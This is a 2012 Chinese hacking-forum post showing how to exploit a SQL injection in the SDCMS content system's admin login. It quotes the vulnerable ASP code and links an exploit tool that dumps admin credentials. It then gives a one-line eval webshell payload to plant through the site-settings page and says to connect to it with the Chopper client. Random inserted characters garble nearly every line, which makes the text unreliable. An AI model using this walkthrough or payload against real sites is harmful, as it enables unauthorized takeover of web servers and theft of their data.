作者:T00LS 鬼哥# H8 X5 [% [% T* B
漏洞文件:后台目录/index.asp/ r9 T7 D$ H9 Q
, Z1 K% C' ?% o2 h$ P4 U& V
Sub Check
( U9 k( d: F5 S8 j+ y' [8 ` Dim username,password,code,getcode,Rs0 M$ ?% L$ j7 N" r2 \# B
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
' k9 J: N4 h6 p* ]" E. H username=FilterText(Trim(Request.Form("username")),1)% J% h+ o9 ?! H1 R. Z$ v( a
password=FilterText(Trim(Request.Form("password")),1)
1 r* i; h" B* X' S6 { code=Trim(Request.Form("yzm"))2 d( T' C$ x( ?' `% a& E
getcode=Session("SDCMSCode")7 W5 t, {9 U, W. u' U3 i
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died8 }5 @0 f( A8 g0 y, }' _9 C, @
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
9 z# E! s# k* v, Z1 ?1 R3 U IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied: S1 }% Y4 b9 A' b* m3 V, ~1 K- k7 O- b
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
' H) R9 C6 [; V' X, ~ IF username="" or password="" Then
7 O8 q1 d4 ~8 A; \. q Echo "用户名或密码不能为空"ied [% |, Z1 b2 j- R! g3 A
Else
+ c4 r0 D) q! g; v+ P2 V Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
& k' _6 {1 u# J! V IF Rs.Eof Then
9 x; g# z; Q# e" t1 Q$ Y7 M AddLog username,GetIp,"登录失败",1% F R- x7 [) e1 c' f
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
+ y: t+ }3 U ^ Else: D! b; Z4 w2 t+ v
Add_Cookies "sdcms_id",Rs(0)8 O5 N9 b6 Y; z
Add_Cookies "sdcms_name",username* y7 [; D- t" w$ e- ]7 R A
Add_Cookies "sdcms_pwd",Rs(2): r* c- ]; _9 Z W1 T2 W
Add_Cookies "sdcms_admin",Rs(3)
3 X' x4 O: q1 C! E9 ~ Add_Cookies "sdcms_alllever",Rs(4)" ^5 b- J$ u8 {& a: c2 V
Add_Cookies "sdcms_infolever",Rs(5)8 B2 h. k5 w+ J5 c" [# N& A( R' q
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&""); N0 K/ R* {) p% @; g- U
AddLog username,GetIp,"登录成功",1
: f% I0 ~8 {6 `4 Y- i6 N '自动删除30天前的Log记录8 s, m i6 x% m4 x0 d8 h
IF Sdcms_DataType Then6 ~6 S, K, d, e" p
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")# ~( Y, I x$ {# I( O$ k" Z- h
Else! l3 a3 Q9 q# n: h. X) e
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
, O- e/ z$ K1 o" Y1 j- j6 l End IF- y6 C7 N+ [1 S, P0 S8 X! P% Q
Go("sdcms_index.asp")
- c* c; m* }# ]4 a7 e End IF
- F% Q( c9 O- x" M' r& d' T Rs.Close
) B) s' Y' E& C! l9 h- @. }0 d: ]% n Set Rs=Nothing4 j, [* p$ J+ {6 Y1 i/ p4 B
End IF6 N3 P, h* k* ~" F- ^$ Q0 f
End Sub6 o+ U* V7 e2 E, _6 V
' D% a2 X/ }7 t; P’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
. ]7 L9 T( y* L+ E; ~! n
, l0 V0 i5 R0 DFunction FilterText(ByVal t0,ByVal t1)2 ?1 \* u- Q" \
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
- a" @1 j5 A7 L1 B1 l. [9 R t0=Trim(t0)* j7 d$ L3 ?+ s: P: ?
Select Case t1
9 b& a( y; Q! p# ]$ Z4 q8 w Case "1"6 \. T6 R; A8 c
t0=Replace(t0,Chr(32),"")
9 j M$ L8 i5 s9 W& ^1 [; a9 z t0=Replace(t0,Chr(13),"")
0 n/ F3 D% b7 B; V6 O5 r/ D t0=Replace(t0,Chr(10)&Chr(10),"")
. s: `1 u8 a& k t0=Replace(t0,Chr(10),"")8 r# Z' v4 V9 [* H6 ]; P) m4 `
Case "2"
7 c* L9 i" g+ e t0=Replace(t0,Chr(8),"")'回格
. g2 F7 f, x) g( ] t0=Replace(t0,Chr(9),"")'tab(水平制表符)' k- u/ h6 ?4 v
t0=Replace(t0,Chr(10),"")'换行
3 v6 l# \" Y4 q/ m7 G; [ t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
6 q% ?) y1 g9 [3 E t0=Replace(t0,Chr(12),"")'换页6 F+ u$ y3 L0 z4 F
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合& z4 p( A) D+ v) L' `
t0=Replace(t0,Chr(22),"")
+ i9 q% P; E+ C2 F h A! m t0=Replace(t0,Chr(32),"")'空格 SPACE8 h9 c, `. U4 |
t0=Replace(t0,Chr(33),"")'!
+ L* H$ I6 R9 ] t0=Replace(t0,Chr(34),"")'"; ?* O7 X- s# p' k6 J$ u: ], f- a
t0=Replace(t0,Chr(35),"")'#
4 w2 E2 O- U$ u. }. Q& U' [ t0=Replace(t0,Chr(36),"")'$
; @4 O. l% B# q7 Y t0=Replace(t0,Chr(37),"")'%; e: P6 ?& s" p
t0=Replace(t0,Chr(38),"")'&
% Q. F7 L$ w: s( G3 w0 O$ {( Q t0=Replace(t0,Chr(39),"")'') v( }: @9 w# `8 e& w* A/ A
t0=Replace(t0,Chr(40),"")'(. z7 n( i, e& `
t0=Replace(t0,Chr(41),"")')( R |, A( S, m
t0=Replace(t0,Chr(42),"")'*
$ @7 f, @; z9 d t0=Replace(t0,Chr(43),"")'+. f7 q' } t( b! w( A
t0=Replace(t0,Chr(44),"")',
3 t! h$ o/ {9 ] t0=Replace(t0,Chr(45),"")'-
! w8 s: g4 _. |; F* P! c: m t0=Replace(t0,Chr(46),"")'.5 B% }& w$ E. v+ N* x, X! H
t0=Replace(t0,Chr(47),"")'/
3 i/ {1 i) A; O5 Q t0=Replace(t0,Chr(58),"")':
" }' n7 w T o" l& w; Y t0=Replace(t0,Chr(59),"")'; c/ ?1 z- V, W. x1 C+ @
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>9 \( F8 W. h% N& I( u
t0=Replace(t0,Chr(63),"")'?, Z6 L5 p2 P' l! h N- P
t0=Replace(t0,Chr(64),"")'@: X! I, }. w& a! n
t0=Replace(t0,Chr(91),"")'\
# f3 M7 c" z# }# H f t0=Replace(t0,Chr(92),"")'\
- J ~. B3 O" i; g8 d, a P t0=Replace(t0,Chr(93),"")']
3 G4 v1 l, v2 S3 f+ x* H t0=Replace(t0,Chr(94),"")'^& a$ s1 Q3 p$ T( O0 K: \4 m/ L8 j2 F5 \
t0=Replace(t0,Chr(95),"")'_! D9 d8 |& u( K( u8 h9 F
t0=Replace(t0,Chr(96),"")'`
& ^" l9 e! E* q0 P' K- ]# }) l t0=Replace(t0,Chr(123),"")'{
( {0 Z; S$ m8 v1 e: b t0=Replace(t0,Chr(124),"")'|
2 L% h- j2 `6 ?1 b9 f2 `( j% F9 T t0=Replace(t0,Chr(125),"")'}1 K3 L; X& U! i. w5 [
t0=Replace(t0,Chr(126),"")'~" v+ P' ^7 A3 M. |
Case Else: h$ [1 o+ l8 {! d) N: |
t0=Replace(t0, "&", "&")& Z6 T% C: L/ [% B g
t0=Replace(t0, "'", "'")
7 S' e) m0 `- [1 H t0=Replace(t0, """", """)* X( S' ]+ W/ i& r+ h
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")7 X, O$ ^( g1 P$ ^' ~- p8 J
End Select
0 d3 P2 K& ? \7 f k5 ^3 R: E IF Instr(Lcase(t0),"expression")>0 Then
1 m* @ n* W# |' [# Y" ~ t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
; B7 J `7 O" i9 n1 h' E End If
% m" Q4 L$ C& V" f& F* z FilterText=t0
3 s4 u7 z9 A, n$ Z4 g) v6 d, YEnd Function
9 y. M/ B6 b8 d4 i4 e
; ?" {) L% [) u( Z- m看到没。直接参数是1 只过滤9 m1 i- R5 G2 i, ~) j A# q3 \
t0=Replace(t0,Chr(32)," ")- `7 T/ _, I8 L$ P+ n
t0=Replace(t0,Chr(13),"")0 j: G% Q8 `1 R) ?& B3 w& l- X3 u
t0=Replace(t0,Chr(10)&Chr(10),"3 S5 r( D( N$ a
")& ]0 x: g% ~% w; ^7 l5 Z- U
t0=Replace(t0,Chr(10),"
! N [% \0 e# B) D) a/ ^")
- Q% i/ m% q1 {4 n% S$ I漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
7 y7 F/ P) J. n; KEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP% Z# N) } ~; y9 n+ Q6 E8 |
2 d0 _( Y5 R; G- R) k4 d0 a测试:+ f6 h1 L: i5 \3 U" x# t2 L
4 k3 {0 T5 j$ l/ P7 W" ?; @) W1 b* v8 d' p: ?4 [0 t7 _. \
现在输入工具上验证码,然后点OK
* |- R7 U, o; Y% l1 {+ s9 ^4 M3 X6 ]6 v3 c
6 l4 H4 P9 ]9 d5 k: W# Z
看到我们直接进入后台管理界面了,呵呵!
9 g' l0 m( D( ^5 A1 T$ J; W( h' U* ~/ ~ W1 B% S5 @8 ]& J) a/ Z
3 u! P! J- a. ~, a4 ]; d
& `3 ]+ C# O1 h) a1 `
这样直接进入后台了。。。。
, j, }$ M/ p. ^. M6 e. a
9 d1 G, E4 C: x! V: D& r0 h ]% d' X# i3 ~5 l
# B3 A0 H6 z" \" h3 LSDCMS提权:
! \& q- Q- Q0 Q8 J# j
1 m9 |) V7 z! E7 ^3 z+ J C方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
/ R" Y3 P7 r) u9 Q, Y$ y
8 Y* D2 w) H, [7 m) T* {5 k5 C6 H
* n5 y/ j7 O! S5 }! W. }& P
# l1 \( F" M. [; _ r( UOK,现在用菜刀连接下!7 ^# E# F- x2 I$ J# G
; h9 M# x4 e% K$ T% |- P! f* p
/ u; k' V, W* L8 x6 d1 K/ u' f4 P/ L3 G0 g
0 u- s+ l2 N7 n& M- v8 f* \
1 V- k* G. E- y
|
发表于 2012-11-9 20:57:02
收藏
支持
反对